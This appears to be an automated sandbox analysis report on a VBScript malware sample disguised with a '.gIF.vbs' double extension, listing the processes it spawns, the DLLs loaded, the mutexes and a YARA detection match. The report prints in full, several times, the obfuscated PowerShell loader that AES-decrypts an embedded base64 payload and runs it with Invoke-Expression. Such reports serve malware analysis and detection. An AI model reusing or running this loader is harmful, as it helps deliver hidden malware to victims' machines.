TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346528F22_2_00007FFD346528F2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD346516C92_2_00007FFD346516C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34652AFB2_2_00007FFD34652AFB
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347274FE2_2_00007FFD347274FE
        Source: creatednewwaterbottleforme.gIF.vbsInitial sample: Strings found which are bigger than 50
        Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.expl.evad.winVBS@4/3@0/2
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l1xgj3oo.ln1.ps1Jump to behavior
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs"
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: creatednewwaterbottleforme.gIF.vbsVirustotal: Detection: 10%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\creatednewwaterbottleforme.gIF.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cReP
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
